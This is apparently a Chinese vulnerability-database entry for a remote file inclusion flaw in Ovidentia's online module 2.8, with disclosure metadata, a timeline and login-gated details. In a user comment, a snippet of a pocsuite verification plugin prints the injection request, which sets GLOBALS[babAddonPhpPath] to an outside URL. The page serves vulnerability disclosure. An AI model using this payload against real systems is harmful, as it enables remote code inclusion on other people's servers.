Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] 远程文件包含

基本字段

漏洞编号:
SSV-90166
披露/发现时间:
2015-12-21
提交时间:
2015-12-22
漏洞等级:
漏洞类别:
远程文件包含
影响组件:
漏洞作者:
bd0rk
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

登录后查看

漏洞详情

贡献者 匿名 共获得  0.2KB
登录后查看
Yolanda_Xu 共 1  兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 匿名 共获得   2KB
登录后查看
Yolanda_Xu 共 2 兑换

参考链接

登录后查看

解决方案

登录后查看

生命线

  • 2015-12-21 发现/披露了漏洞
  • 2015-12-22 提交了漏洞
  • Knownsec
    2015-12-29 提交补充了漏洞详情
  • hhxx
    2015-12-30 提交更新了 PoC

相关漏洞

人气 1572
评论前需绑定手机 现在绑定

全部评论 (2)

  • 另外 online-2-8文件夹是放在ovidentia文件夹下还是functionalties文件夹下?
    回复 0 0
    2F
  • 请问如果直接在地址栏访问,下面的地址应该如何输入? def _verify(self): payload = '/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=' verify_url = '%s%s%s' % (self.url,payload,'https://www.baidu.com/robots.txt?') response = req.get(verify_url) return self.parse_verify(response,verify_url) 刚刚入手,请指教!
    回复 0 0
    1F

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负

京ICP备10040895号 京公网安备 11010502034610号 Copyright @ 404 Team from Knownsec. English